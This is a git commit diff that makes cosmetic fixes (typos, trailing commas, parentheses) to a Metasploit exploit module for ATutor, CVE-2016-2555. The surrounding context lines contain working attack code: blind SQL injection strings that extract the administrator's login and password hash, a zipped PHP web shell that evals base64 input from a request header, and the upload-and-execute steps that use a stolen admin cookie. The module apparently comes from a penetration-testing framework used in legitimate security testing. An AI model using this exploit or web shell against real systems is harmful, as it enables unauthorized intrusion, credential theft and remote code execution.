Fix some things

wvu · wvu · commit d9d257cb1ab1 · 2016-04-05T19:23:11.000-05:00
diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb
@@ -17,7 +17,7 @@ def initialize(info={})
       'Description'    => %q{
          This module exploits a SQL Injection vulnerability and an authentication weakness
          vulnerability in ATutor. This essentially means an attacker can bypass authenication
-         and reach the administrators interface where they can upload malicious code.
+         and reach the administrator's interface where they can upload malicious code.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -28,7 +28,7 @@ def initialize(info={})
         [
           [ 'CVE', '2016-2555'  ],
           [ 'URL', 'http://www.atutor.ca/' ],                        # Official Website
-          [ 'URL', 'http://sourceincite.com/research/src-2016-08/']  # Advisory
+          [ 'URL', 'http://sourceincite.com/research/src-2016-08/' ] # Advisory
         ],
       'Privileged'     => false,
       'Payload'        =>
@@ -43,7 +43,7 @@ def initialize(info={})
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
+        OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/'])
       ],self.class)
   end
 
@@ -61,7 +61,7 @@ def print_good(msg='')
 
   def check
     # the only way to test if the target is vuln
-    if test_injection()
+    if test_injection
       return Exploit::CheckCode::Vulnerable
     else
       return Exploit::CheckCode::Safe
@@ -75,7 +75,7 @@ def create_zip_file
     @plugin_name  = Rex::Text.rand_text_alpha_lower(3)
 
     path = "#{@plugin_name}/#{@payload_name}.php"
-    # this content path is where the ATutor authors recommended to install it
+    # this content path is where the ATutor authors recommended installing it
     register_file_for_cleanup("#{@payload_name}.php", "/var/content/module/#{path}")
     zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
     zip_file.pack
@@ -86,7 +86,7 @@ def exec_code
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"),
       'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
-    }, timeout = 0.1)
+    }, 0.1)
   end
 
   def upload_shell(cookie)
@@ -99,20 +99,20 @@ def upload_shell(cookie)
       'method' => 'POST',
       'data' => data,
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-      'cookie' => cookie,
+      'cookie' => cookie
     })
 
     if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}")
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection),
-         'cookie' => cookie,
+         'cookie' => cookie
        })
        if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}")
           res = send_request_cgi({
             'method' => 'GET',
             'uri'    => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"),
-            'cookie' => cookie,
+            'cookie' => cookie
           })
        return true
        end
@@ -162,7 +162,7 @@ def perform_request(sqli)
     return res.body
   end
 
-   def dump_the_hash()
+   def dump_the_hash
     extracted_hash = ""
     sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)"
     login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli).to_i
@@ -220,7 +220,7 @@ def generate_sql_and_test(do_true=false, do_test=false, sql=nil)
     end
   end
 
-  def test_injection()
+  def test_injection
     if generate_sql_and_test(do_true=true, do_test=true, sql=nil)
        if generate_sql_and_test(do_true=false, do_test=true, sql=nil)
         return true
@@ -260,7 +260,7 @@ def report_cred(opts)
 
   def exploit
     print_status("Dumping the username and password hash...")
-    credz = dump_the_hash()
+    credz = dump_the_hash
     if credz
       print_good("Got the #{credz[0]}'s hash: #{credz[1]} !")
       admin_cookie = login(credz[0], credz[1])
